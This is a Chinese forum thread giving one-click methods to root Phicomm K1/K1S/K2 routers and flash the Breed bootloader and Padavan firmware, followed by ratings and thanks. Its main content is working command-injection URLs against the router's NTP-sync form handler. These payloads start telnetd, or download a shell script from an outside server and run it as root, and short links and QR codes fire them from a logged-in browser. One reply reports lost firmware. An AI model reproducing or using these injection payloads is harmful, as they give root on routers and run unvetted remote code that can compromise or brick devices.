QQ登录

只需一步,快速开始

搜索
广告投放联系QQ68610888

斐讯k1,k1s,k2傻瓜刷机 免拆机免TTL 开启telnet 一键刷breed 无需下载任何工具 超简单

火... [复制链接]

微博上看到的,斐讯 V21.4.5.5新版固件被大神成功root了,免拆机免TTL,微博围观地址:http://weibo.com/2756835480/DAfr1hWDs

2016-07-20 好多人用的长城、移动山寨宽带打不开网址,换成了国内服务器,还有人用的老旧的版本不舍得升级就喊无效,增加了一个旧版本专用二维码。
2016-06-25 增加一键刷 华硕&老毛子Padavan!breed和华硕固件一次搞定!无需下载任何工具!不用电脑!不用网线!不用进breed!
手机操作也可以!傻瓜式刷机!打开一个网址或扫描二维码全搞定!

2016-06-20 增加一键刷 breed!  无需开启telnet !  免拆机!免TTL! 无需下载任何工具!手机操作也可以!傻瓜式刷breed!打开一个网址就搞定!

2016-06-19 最新消息:作者已经公布方法!
感谢原创作者!
作者微博:http://weibo.com/the404

系统下的root和uboot无关,  k1、k1s、k2都是一套系统,全部通用,和硬件版本也无关。
V21.4.6.10、V21.4.5.6、 V21.4.5.5、V21.4.4.8全支持,向下兼容。

不会使用和进入breed的、不会使用padavan的、不仔细看帖子的、不去我给出的相关帖子学习的我也没办法。

2016-06-25 一键刷 breed + 华硕Padavan:

1:路由器能正常上网,登陆进路由器 (默认密码admin)

2:用浏览器打开这个网址或者扫描二维码(默认ip 192.168.2.1)
等待1分钟,等待1分钟,等待1分钟
http://t.im/asus
V21.4.4.8以下版本用这个→
鄙视那些转载不注明的!

等待1分钟,完成!就是这么简单! 无需下载任何工具!breed + 华硕Padavan固件 一次搞定!可以全程手机操作!打开一个网址全搞定!
两个都增加MD5验证,打消你的一切后顾之忧!保证刷机过程100%安全!
增加网页刷机日志,方便查错。增加网页重启按钮。
安卓测试也没问题,因为是浏览器方案,跨平台,网络通畅的话1分多钟就搞定。
测试使用微信扫一扫,扫第一下会进入登陆界面,登陆后返回扫第二下,等待1分钟左右网页完成或者跳转到登陆页面,
登陆后就可以看到刷机日志.
(如果正在刷入是打不开登陆页面的,耐心等待操作完成)。
微信刷机演示:

日志截图:

padavan固件发布帖https://www.right.com.cn/forum/thread-161324-1-1.html
padavan固件中文网http://rt.cn2k.net/

2016-06-20 一键刷 breed:

1:路由器能正常上网,登陆进路由器 (默认密码admin)

2:用浏览器打开这个网址,如果默认ip不是192.168.2.1修改一下

1. http://192.168.2.1/goform/gra_NTPSyncWithLocal?text_year="2016|`if wget -O /tmp/asus.sh http://code.taobao.org/svn/asus_bin/asus.sh;then sh /tmp/asus.sh breed;fi`"
复制代码

什么?上面的网址都不会复制?那么点击这个链接或者扫描二维码总会吧!

http://t.im/breedk2
V21.4.4.8以下版本用这个→

192.168.22.1 纯手机操作演示

完成!就是这么简单!无需开启telnet !  免拆机!免TTL! 无需下载任何工具!只用手机都可以!breed就刷好了!

点完以后重新登陆路由 会显示breed ok! 就证明刷breed成功了,捅菊花进breed随意刷机吧!

转载请注明!谢谢!

breed详细使用方法可以看breed作者帖子https://www.right.com.cn/forum/thread-161906-1-1.html

下面是具体开启telnet方法:

更新一种简化方法,我简化了原作者的方法,直接通过浏览器完成,转载请注明!

1:网页登陆路由器 默认密码admin

2:浏览器打开这个网址,如果默认ip不是192.168.2.1修改一下

1. http://192.168.2.1/goform/gra_NTPSyncWithLocal?text_year="2016|`telnetd`"
复制代码

3:
完成!telnet 192.168.2.1吧 ,不会telnet自己百度。

原作者方法:

1:网页登陆路由器 默认密码admin

2:下载附件 ,解压打开opentelnet.html 按照提示 如果默认ip不是192.168.2.1修改一下,

3:点击 open telnetd

完成!

telnet 192.168.2.1吧 ,不会telnet自己百度。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

评分

LNDU9703 + 1 一看就是觉得高端、大气、上档次!
近未来 + 1 支付宝已转5毛给你!
gujiangjiang + 1 我来恩山就是为了看你!
zhujianiing + 1 我来恩山就是为了看你!
jhk45633 + 1 楼主威武—我就想问问挖掘机技术哪家强?
潘小花花花花 + 1 亲,你这么厉害,我想做你的经纪人!
幻想是泡沫 + 1 我来恩山就是为了看你!
okevin -1 根本用不了,404!
chenjinghua0322 + 1 我来恩山就是为了看你!
lzyeric + 1 我来恩山就是为了看你!
abmin521 + 1 支付宝已转500w给你!
yushaye + 1 我来恩山就是为了看你!
l331805072 + 1 亲,你这么厉害,我想做你的经纪人!
acexxy + 1 一看就是觉得高端、大气、上档次!
墨玉壹 + 1 狗东买的K1S v21.4.4.8刷Padavan成功,显示PDCN,管理网址1
q541447 + 1 亲,你太牛逼了,走,我请你吃鳇鱼头去~~~
leon_cxf + 1 土豪,我们做朋友吧!
945 + 1 亲,你太牛逼了,走,我请你吃鳇鱼头去~~~
hnmcc1860 + 1 亲,你太牛逼了,走,我请你吃鳇鱼头去~~~
nice123133 + 1 楼主威武—我就想问问挖掘机技术哪家强?
jjss520 + 1 亲,你太牛逼了,走,我请你吃鳇鱼头去~~~
流心奸商 + 1 感谢有你,路由器刷breed刷固件变得如此简单
jasonkguan + 1 亲,你太牛逼了,走,我请你吃鳇鱼头去~~~
vov + 1 亲,你太牛逼了,走,我请你吃鳇鱼头去~~~
sun91520 + 1 切糕党手持切糕刀强势围观楼主!
clw9981 + 1 楼主威武—我就想问问挖掘机技术哪家强?
lxdfly + 1 breed OK了,然后自己刷个固件就行了
huangzexin2008 + 1 亲,你太牛逼了,走,我请你吃鳇鱼头去~~~
youpda + 1 专门注册账号来感谢一下。一键成功
php100 + 1 恩山牛人就是多,大神我顶你
nirvana520 -1 点了一下网址,我本来完整去后门带KEY的ROOT固件都没了。你这代码也太呆过分了
沙_漠 + 1 泥马,真给力,我要顶!太简单了,太强大了。什么都不用做。
俄摘星星给你” + 3 亲,你太牛逼了,走,我请你吃鳇鱼头去~~~
chokee + 1 刷完后出现的无线并不是ASUS而是PDCN,刷完后以为变砖了,看到回复才知道是p
Triwind + 1 亲,你太牛逼了,走,我请你吃鳇鱼头去~~~
adagiov + 1 太神了~
xiu9520 + 1 亲,你太牛逼了,走,我请你吃鳇鱼头去~~~
ruike002 + 1 亲,你太牛逼了,走,我请你吃鳇鱼头去~~~
512557852 + 1 亲,你太牛逼了,走,我请你吃鳇鱼头去~~~
idonline + 1 真的可以,用http://192.168.2.1/goform/gra_NTPS
frighter + 1 方法真的很简单,这个固件非常稳定,赞你,希望继续提供好东西!
风若廷 + 1 大神 为什么我打不开短网址呀 扫二维码也不行 就是一片白 没反应
hzailz + 1 亲,你太牛逼了,走,我请你吃鳇鱼头去~~~
toopoo + 1 亲,你太牛逼了,走,我请你吃鳇鱼头去~~~
zym992330797 + 1 变成一串长长的字符串
adwu + 1 打开就 变成一串长长的字符串 怎么处理呢,,网址不行了吗?
mianju211 + 1 亲,你太牛逼了,走,我请你吃鳇鱼头去~~~
e88148355 + 1 刷好后 wifi密码是1234567890
morfell + 1 楼主威武—我就想问问挖掘机技术哪家强?
mjzcng + 1 一次刷成功了,不过最新的这个一键刷会连breed一起刷了么?我试了好多次拔电源按
skyline945 + 1 亲,你太牛逼了,走,我请你吃鳇鱼头去~~~
sseakoom + 1 请教个问题,sucess成功后,搜索信号出现一个ASUS,然后连接提示需要网络密
888110 + 1 亲,你太牛逼了,走,我请你吃鳇鱼头去~~~
zhong1200 + 1 亲,你太牛逼了,走,我请你吃鳇鱼头去~~~
efs + 1 亲,你太牛逼了,走,我请你吃鳇鱼头去~~~
znew + 1 强大的恩山!(以下重复1万次)
yc263158 + 1 亲,你太牛逼了,走,我请你吃鳇鱼头去~~.
航校门口二楼修 + 1 亲,你太牛逼了,走,我请你吃鳇鱼头去~~.
159789 + 1 呐,做人呢,最重要的就是开心
longlo + 20 谢谢支持,20分心意,敬请收下

我的恩山、我的无线 The best wifi forum is right here.
还好有备份。。。
我的恩山、我的无线 The best wifi forum is right here.

前排支持一下。。。。。。

支持一下啊

看起来很不错哦,收藏备用~~~
谢谢LZ啦!!!

来学习下!!

终于等到可以刷第三方固件了

非常需要,谢谢大神

就是这么简单?

感谢分享 谢谢

大动干戈杜克能源

刷机也能一步搞定了?

。。。。。。。。。。。。。。。。。

多谢楼主